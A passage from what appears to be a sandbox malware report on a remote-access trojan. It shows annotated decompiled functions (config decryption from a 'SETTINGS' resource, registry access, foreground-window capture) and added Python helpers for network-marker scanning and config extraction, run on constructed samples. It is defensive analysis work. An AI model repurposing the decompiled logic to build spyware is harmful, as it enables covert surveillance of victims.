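    """Run both checks over one buffer (a carved payload or a memory dump)."""
    return {"frame": parse_datastart_frame(blob), "markers": scan_markers(blob)}


if __name__ == "__main__":
    # Constructed inputs; not traffic or memory captured from this sample.
    frame = build_datastart_frame(5, 0, b"hello")
    print(parse_datastart_frame(frame))
    dump = (b"\x00" * 16 + b"2.7.1 Pro\x00pth_unenc\x00" + b"\x90" * 4
            + b"Timeout expired, resetting connection.\x00")
    for off, name in scan_markers(dump):
        print(f"{off:#010x} {name}")
```

Run it against a process dump of the injected image or against TCP payloads carved from the sandbox pcap; a hit on "[DataStart]" at offset 0 of a payload is the framing check, hits elsewhere are the string-table markers.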

                                  Control-flow Graph

                                  control_flow_graph: _entry_ at 0x413fa4-0x4140f5, 16 basic blocks (in the original report blocks are coloured executed / not executed). The graph's API sequence is the CRT start-up: __set_app_type, __p__fmode, __p__commode, an optional __setusermatherr, _initterm, __getmainargs, _initterm again, the command-line scan (blocks 777-785), GetStartupInfoA, GetModuleHandleA, the call to 0x408c98, exit and _XcptFilter.
                                  C-Code - Quality: 79%
                                  			// Standard MSVC 6 CRT entry point (WinMainCRTStartup): initialises the
                                  			// C runtime, runs the static initialiser tables, skips the program name
                                  			// in the command line, reads the requested show state and calls the
                                  			// program's WinMain at 0x408c98. Only that address and the initialiser
                                  			// tables are sample-specific.
                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
                                  				CHAR* _v8;
                                  				intOrPtr* _v24;
                                  				intOrPtr _v28;
                                  				struct _STARTUPINFOA _v96;
                                  				int _v100;
                                  				char** _v104;
                                  				int _v108;
                                  				void _v112;
                                  				char** _v116;
                                  				intOrPtr* _v120;
                                  				intOrPtr _v124;
                                  				intOrPtr* _t24;
                                  				void* _t27;
                                  				intOrPtr _t36;
                                  				signed int _t38;
                                  				int _t40;
                                  				intOrPtr* _t41;
                                  				intOrPtr _t42;
                                  				intOrPtr _t49;
                                  				intOrPtr* _t54;
                                  				intOrPtr _t57;
                                  				intOrPtr _t60;
                                  
                                  				_push(0xffffffff);                    // SEH frame for the CRT's __try/__except around WinMain
                                  				_push(0x416e50);
                                  				_push(0x414130);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t57;
                                  				_v28 = _t57 - 0x68;
                                  				_v8 = 0;
                                  				__set_app_type(2);                    // 2 = _GUI_APP
                                  				 *0x41c26c =  *0x41c26c | 0xffffffff;
                                  				 *0x41c270 =  *0x41c270 | 0xffffffff;
                                  				 *(__p__fmode()) =  *0x41c264;
                                  				_t24 = __p__commode();
                                  				_t47 =  *0x41c260;
                                  				 *_t24 =  *0x41c260;
                                  				 *0x41c268 = _adjust_fdiv;
                                  				_t27 = E00404F3A( *_adjust_fdiv);
                                  				_t60 =  *0x41b190; // 0x1
                                  				if(_t60 == 0) {
                                  					__setusermatherr(E0041412C);
                                  					_pop(_t47);
                                  				}
                                  				E0041411A(_t27);
                                  				_push(0x41b0e8);
                                  				_push(0x41b0e4);
                                  				L00414114();                          // _initterm over the C initialiser table
                                  				_v112 =  *0x41c25c;
                                  				__getmainargs( &_v100,  &_v116,  &_v104,  *0x41c258,  &_v112);
                                  				_push(0x41b0e0);
                                  				_push(0x41b000); // executed
                                  				L00414114(); // executed; _initterm over the C++ constructor table
                                  				_t54 =  *_acmdln;
                                  				_v120 = _t54;
                                  				// Skip the program name: a quoted name runs to the closing quote, an
                                  				// unquoted one to the first blank; L7/L6 then skip the blanks that
                                  				// precede the first argument, leaving _t54 as lpCmdLine.
                                  				if( *_t54 != 0x22) {
                                  					while(1) {
                                  						__eflags =  *_t54 - 0x20;
                                  						if(__eflags <= 0) {
                                  							goto L7;
                                  						}
                                  						_t54 = _t54 + 1;
                                  						_v120 = _t54;
                                  					}
                                  				} else {
                                  					do {
                                  						_t54 = _t54 + 1;
                                  						_v120 = _t54;
                                  						_t42 =  *_t54;
                                  					} while (_t42 != 0 && _t42 != 0x22);
                                  					if( *_t54 == 0x22) {
                                  						L6:
                                  						_t54 = _t54 + 1;
                                  						_v120 = _t54;
                                  					}
                                  				}
                                  				L7:
                                  				_t36 =  *_t54;
                                  				if(_t36 != 0 && _t36 <= 0x20) {
                                  					goto L6;
                                  				}
                                  				_v96.dwFlags = 0;
                                  				GetStartupInfoA( &_v96);
                                  				_t68 = _v96.dwFlags & 0x00000001;     // STARTF_USESHOWWINDOW
                                  				if((_v96.dwFlags & 0x00000001) == 0) {
                                  					_t38 = 0xa;                       // SW_SHOWDEFAULT
                                  				} else {
                                  					_t38 = _v96.wShowWindow & 0x0000ffff;
                                  				}
                                  				// WinMain(hInstance, NULL, lpCmdLine, nCmdShow); _t47/_t68 are register
                                  				// leftovers the decompiler carried into the call.
                                  				_t40 = E00408C98(_t47, _t68, GetModuleHandleA(0), 0, _t54, _t38); // executed
                                  				_v108 = _t40;
                                  				exit(_t40);
                                  				// Not reached on the normal path: the exception-filter epilogue
                                  				// (_XcptFilter thunk L0041410E) that the decompiler placed after exit().
                                  				_t41 = _v24;
                                  				_t49 =  *((intOrPtr*)( *_t41));
                                  				_v124 = _t49;
                                  				_push(_t41);
                                  				_push(_t49);
                                  				L0041410E();
                                  				return _t41;
			}

                                  Instruction addresses for the C-code above (one per line in the report view): 0x00413fa7 to 0x004140f5

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                  • String ID:
                                  • API String ID: 801014965-0
                                  • Opcode ID: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                  • Instruction ID: 203440f8f63e4a3495bc52082528d8eb2041b3e21c5ddc4624b2c062dd02aed8
                                  • Opcode Fuzzy Hash: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                  • Instruction Fuzzy Hash: 92416DB1D40708EFDB209FA5DC89AEA7FB8EB49710F20412FE95197291D7784880CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 53%
                                  			E00409823(intOrPtr _a4) {
                                  				unsigned int _v8;
                                  				signed char* _v12;
                                  				char _v13;
                                  				void* _v20;
                                  				void* _v24;
                                  				char _v40;
                                  				void* _v56;
                                  				char _v1080;
                                  				void* _t36;
                                  				signed int _t38;
                                  				signed int _t42;
                                  				int _t51;
                                  				signed int _t54;
                                  				signed int _t55;
                                  				signed int _t66;
                                  				signed char* _t76;
                                  				void* _t83;
                                  				void* _t88;
                                  				void* _t89;
                                  
				_v12 = _v12 & 0x00000000;
				_v8 = E00409D02( &_v12); // locates and locks the RT_RCDATA (type 0xA) resource "SETTINGS"; pointer returned in _v12, size in _v8
				_t51 =  *_v12 & 0x000000ff; // first byte of the resource: length of the key
				_t36 = malloc(_t51);
				_t76 = _v12;
				_t54 = _t51;
				_t7 = _t76 + 1; // 0x1; the key starts right after the length byte
				_t88 = _t7;
				_v24 = _t36;
				_t55 = _t54 >> 2;
				memcpy(_t36, _t88, _t55 << 2); // copy the key (rep movsd / rep movsb pair, split by the decompiler)
				_t38 = memcpy(_t88 + _t55 + _t55, _t88, _t54 & 0x00000003);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t38, _t51,  &_v13);
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t38);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				_v8 = _v8 + (_t38 | 0xffffffff) - _t51; // payload length = resource size - 1 - key length
				_t83 = malloc(_v8);
				_t42 = _v12;
				_v20 = _t83;
				_t20 = _t42 + 1; // 0x1
				_t89 = _t51 + _t20; // the payload starts right after the key
				_t66 = _v8 >> 2;
				memcpy(_t89 + _t66 + _t66, _t89, memcpy(_t83, _t89, _t66 << 2) & 0x00000003); // copy the encrypted configuration
				E00402F9B( &_v1080, _v24, _t51); // initialise the cipher state (about 1 KiB on the stack) from the key
				E0040309E( &_v1080,  &_v40, _v20, _v8); // executed; decrypt the payload into the std::string at _v40
				free(_v20);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v40); // copy-construct the result into the caller's return slot (_a4)
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _a4;
			}

                                  Instruction addresses for the C-code above (one per line in the report view): 0x0040982c to 0x00409907

                                  APIs
                                    • Part of subcall function 00409D02: FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                    • Part of subcall function 00409D02: LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                    • Part of subcall function 00409D02: LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                    • Part of subcall function 00409D02: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                  • malloc.MSVCRT ref: 00409846
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                  • malloc.MSVCRT ref: 00409898
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@Resource$??1?$basic_string@V01@@$D@1@@malloc$??4?$basic_string@?c_str@?$basic_string@FindLoadLockSizeofV01@free
                                  • String ID:
                                  • API String ID: 531887698-0
                                  • Opcode ID: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                  • Instruction ID: 644eff2a9cee41870484989b0ac8d3f9873871745537e3c52d27647a0f1bd5cd
                                  • Opcode Fuzzy Hash: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                  • Instruction Fuzzy Hash: 5B314971A0010DEFCF04DFA4E9999EEBBB9FF88315B10416AE916A3290DB746F04CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%
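The function E00409823 above reads the `SETTINGS` resource (type 0xA, RT_RCDATA), treats its first byte as a key length, copies the key and the remaining bytes into two heap buffers, initialises a cipher state of roughly 1 KiB with the key (E00402F9B) and decrypts the payload with that state (E0040309E). The Python below is an added example, not code from the report or from the sample: it parses that layout from a raw resource blob and decrypts it. RC4 is an assumption here (a 256-entry, 4-byte-per-entry state matches the buffer size, but the report does not name the cipher), the resource blob is constructed inline, and the configuration string inside it is made up.

```python
"""Parse a SETTINGS-style resource laid out as [key_len:1][key:key_len][ciphertext:rest].

Added example. RC4 is assumed for the cipher; the sample resource and its
configuration text are constructed here and do not come from the analysed file.
"""
from dataclasses import dataclass


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream). Encrypt and decrypt are the same operation."""
    if not key:
        raise ValueError("empty key")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


@dataclass
class SettingsBlob:
    key: bytes
    ciphertext: bytes

    def decrypt(self) -> bytes:
        # Mirrors E00402F9B (state from key) followed by E0040309E (transform payload).
        return rc4(self.key, self.ciphertext)


def parse_settings(blob: bytes) -> SettingsBlob:
    """Mirror E00409823: byte 0 is the key length, then the key, then the encrypted config."""
    if len(blob) < 2:
        raise ValueError("resource too short")
    key_len = blob[0]
    # Require at least one payload byte after the key, as the malware's size arithmetic implies.
    if key_len == 0 or len(blob) < 1 + key_len + 1:
        raise ValueError(f"bad key length {key_len} for a {len(blob)}-byte resource")
    return SettingsBlob(key=blob[1:1 + key_len], ciphertext=blob[1 + key_len:])


def build_settings(key: bytes, plaintext: bytes) -> bytes:
    """Produce a resource in the same layout; used only to construct a test sample here."""
    if not 1 <= len(key) <= 255:
        raise ValueError("key length must fit in one byte")
    return bytes([len(key)]) + key + rc4(key, plaintext)


def extract_config(resource: bytes) -> bytes:
    """Raw resource bytes in, decrypted configuration bytes out."""
    return parse_settings(resource).decrypt()


# Constructed sample (hypothetical key and config text, not values from the analysed sample).
SAMPLE_KEY = b"examplekey123"
SAMPLE_CONFIG = b"c2.example.invalid:2404|RemoteHost|1"
SAMPLE_RESOURCE = build_settings(SAMPLE_KEY, SAMPLE_CONFIG)


if __name__ == "__main__":
    print(extract_config(SAMPLE_RESOURCE))
```

On a real file the input is the raw data of the RCDATA resource named `SETTINGS` (for example walked out of `pefile`'s `DIRECTORY_ENTRY_RESOURCE` tree). If the output is not readable text, the cipher assumption is wrong and E00402F9B / E0040309E have to be read to confirm what they implement.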

                                  Control-flow Graph

                                  C-Code - Quality: 28%
                                  			E0040B708(void* _a4, void* _a8, char* _a12, void* _a16, int _a32) {
                                  				char* _t13;
                                  				long _t15;
                                  				void* _t18;
                                  				int _t19;
                                  				void* _t25;
                                  
				_t13 = RegCreateKeyA(_a4, _a8,  &_a8); // executed; opens or creates the subkey, handle is stored back into _a8
				if(_t13 != 0) { // anything other than ERROR_SUCCESS (0)
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 0;
				} else {
					__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ(_t25, _t18); // length of the std::string value
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(); // and its bytes
					_t19 = 0;
					_t15 = RegSetValueExA(_a8, _a12, 0, _a32, _t13, _t13); // executed; writes the string as value _a12 with type _a32
					RegCloseKey(_a8);
					if(_t15 == 0) {
						_t19 = 1; // success
					}
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t19;
				}
			}

                                  Instruction addresses for the C-code above (one per line in the report view): 0x0040b715 to 0x0040b773

                                  APIs
                                  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                  • RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                  • RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B76A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                                  • String ID:
                                  • API String ID: 2159132150-0
                                  • Opcode ID: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                  • Instruction ID: 9d1a0f58833d5773874e13301f2acc6375a40e0de57f65db8332e1017e2c10e5
                                  • Opcode Fuzzy Hash: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                  • Instruction Fuzzy Hash: C901B67200050DEFCF01AFE0ED998EE7B69FB98355B008135FD1AA6160DB319D24DBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                  • RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                  • RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@OpenQueryU?$char_traits@Value
                                  • String ID:
                                  • API String ID: 2462357041-0
                                  • Opcode ID: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                  • Instruction ID: f17c32bc227b8fe577d0db1d358ecf0b28a093220f684ee6c8601fb0e55a49ce
                                  • Opcode Fuzzy Hash: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                  • Instruction Fuzzy Hash: F60108B650020DFFDF01DF90DC84DEA7B6DFB48348F104462FA05A6151D7309A659BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?c_str@?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 2505548081-0
                                  • Opcode ID: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                  • Instruction ID: d80b3b6c6aed89596c133f447bcdc90fdca9c0e00c1408e091cb816f9a065f40
                                  • Opcode Fuzzy Hash: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                  • Instruction Fuzzy Hash: A5F0F23240011EEFCF04EF94DC58CEE7B78FF88255B008829F926971A0EB70AA15CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040B692(void* _a4, void* _a8, char* _a12, char* _a16, int _a20, intOrPtr _a24, intOrPtr _a28) {
                                  				char _v1028;
                                  				long _t16;
                                  				long _t19;
                                  
				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed; 0x20019 is KEY_READ
				if(_t16 != 0) {
					L3:
					return 0;
				} else {
					_t19 = RegQueryValueExA(_a8, _a12, 0, 0, _a16,  &_a20); // executed; value data into _a16, size in/out through _a20
					RegCloseKey(_a8); // executed
					if(_t19 != 0) {
						goto L3;
					} else {
						E00402F9B( &_v1028, _a24, _a28); // same cipher-state initialisation as in E00409823, key _a24 of length _a28
						E00403010( &_v1028, _a16, _a20); // transform the value data read from the registry with that state
						return 1;
					}
				}
			}

                                  Instruction addresses for the C-code above (one per line in the report view): 0x0040b6ac to 0x0040b707

                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                  • RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                  • RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: 0c6a4740dae7841fcf8964945fbab675c41921e593c3645a08b688649a1aa0f7
                                  • Instruction ID: 12c492740cd6cd608dd50e7b32a974a13a24a52f7ce3ce9e30b48251fadff788
                                  • Opcode Fuzzy Hash: 0c6a4740dae7841fcf8964945fbab675c41921e593c3645a08b688649a1aa0f7
                                  • Instruction Fuzzy Hash: CA01FB35100209FFDF119F90EC05FDA3B75FB88758F008025FA14A61A0D775D925EB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040B4C8(void* __ecx, void* _a4, void* _a8, char* _a12, char* _a16) {
                                  				int _v8;
                                  				int _v12;
                                  				int _t14;
                                  				long _t16;
                                  				long _t20;
                                  				signed int _t21;
                                  
				_t14 = 4;
				_v8 = _t14; // cbData: the caller's buffer holds one DWORD
				_v12 = _t14; // receives the value type from RegQueryValueExA
				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed; 0x20019 is KEY_READ
				if(_t16 != 0) {
					return 0;
				} else {
					_t20 = RegQueryValueExA(_a8, _a12, 0,  &_v12, _a16,  &_v8); // executed
					_t21 = RegCloseKey(_a8); // executed
					return _t21 & 0xffffff00 | _t20 == 0x00000000; // true only if the query succeeded
				}
			}

                                  Instruction addresses for the C-code above (one per line in the report view): 0x0040b4cf to 0x0040b521

                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                  • RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                  • RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                  • Instruction ID: e9b8f34285146556d923ff1311e539e3090c3a2a7499f994c32c4d3a3a900868
                                  • Opcode Fuzzy Hash: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                  • Instruction Fuzzy Hash: A8F0F976900218FFDF118FA0EC06FDA7FA8EB48764F148165FA05EA150E7719A10AB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00412660(intOrPtr _a4) {
                                  				char _v5;
                                  				short _v520;
                                  				struct HWND__* _t6;
                                  
				_t6 = GetForegroundWindow(); // executed
				GetWindowTextW(_t6,  &_v520, 0x200); // title of the foreground window, up to 0x200 wide characters
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v520,  &_v5); // wrap it in a std::wstring built in the caller's return slot (_a4)
				return _a4;
			}

                                  Instruction addresses for the C-code above (one per line in the report view): 0x00412669 to 0x0041269a

                                  APIs
                                  • GetForegroundWindow.USER32 ref: 00412669
                                  • GetWindowTextW.USER32 ref: 0041267C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412690
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@Window$??0?$basic_string@ForegroundG@1@@G@2@@std@@G@std@@TextU?$char_traits@
                                  • String ID:
                                  • API String ID: 3479648101-0
                                  • Opcode ID: 63886bd1b0f191d4c741fb758813c9ae68fde036165b119f932706caa7c95f77
                                  • Instruction ID: 64d1ce8039e3a540394b6b1977bfd4dfbb3997696942590b923d2ce918142fcd
                                  • Instruction Fuzzy Hash: 40E0ECB950030FEBDB04EBA0ED4DED9777CAB44309F0081A1B61697191DA74A6498F94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004122C4(intOrPtr* _a4) {
                                  				struct _MEMORYSTATUSEX _v68;
                                  				intOrPtr* _t8;
                                  
                                  				_v68.dwLength = 0x40;
                                  				GlobalMemoryStatusEx( &_v68); // executed
                                  				_t8 = _a4;
                                  				 *_t8 = _v68.ullTotalPhys;
                                  				 *((intOrPtr*)(_t8 + 4)) = _v68.ullAvailPhys;
                                  				return _t8;
                                  			}

                                  APIs
                                  • GlobalMemoryStatusEx.KERNELBASE(?), ref: 004122D5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID: @
                                  • API String ID: 1890195054-2766056989
                                  • Opcode ID: 933be3831ea0970a646f6a91defc356e7c8b327d25a017e9f5a00cd18de0f79f
                                  • Instruction ID: 75f814dcae9d38af4eaa51e93271515a162649f50c927f4fe6c9e38d045eb332
                                  • Instruction Fuzzy Hash: E8D067B8901308DFCB04DF94D54999CBBB9BB48344F404058E906A7350DB74E905CA95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
